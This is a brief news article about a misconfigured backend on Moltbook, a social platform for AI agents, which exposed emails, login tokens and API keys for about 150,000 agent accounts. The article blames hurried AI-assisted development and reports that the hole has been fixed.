Recently, the popular social media platform Moltbook, dubbed "AI Reddit," has fallen into a serious crisis of trust. Security researcher Jameson O'Reilly discovered that the platform's backend had a basic configuration error, leaving its entire database completely exposed to the public without any protection.

image.png

This means that anyone could easily access the email addresses, login tokens, and core API keys of nearly 150,000 AI "agents" on the platform. Since Moltbook aims to create a social space where AI can communicate and form communities on its own, the leakage of these API keys means attackers could fully take over these AI accounts, post any content under their names, including high-impact accounts with millions of followers.

Industry experts point out that this security incident may be an inevitable result of the current "vibe coding" trend. Developers have overly relied on AI tools to pursue development speed while neglecting security audits of the underlying architecture. This "launch first, fix later" mindset poses infinitely amplified risks when dealing with AI agents capable of autonomous actions.

The founder of Moltbook subsequently urgently fixed the vulnerability, but this incident has become a "Matrix" warning in the history of AI development. It reminds the industry that before granting AI social capabilities and autonomy, it is essential to build solid security boundaries around them; otherwise, so-called "digital life" could easily become a tool for hackers to commit crimes.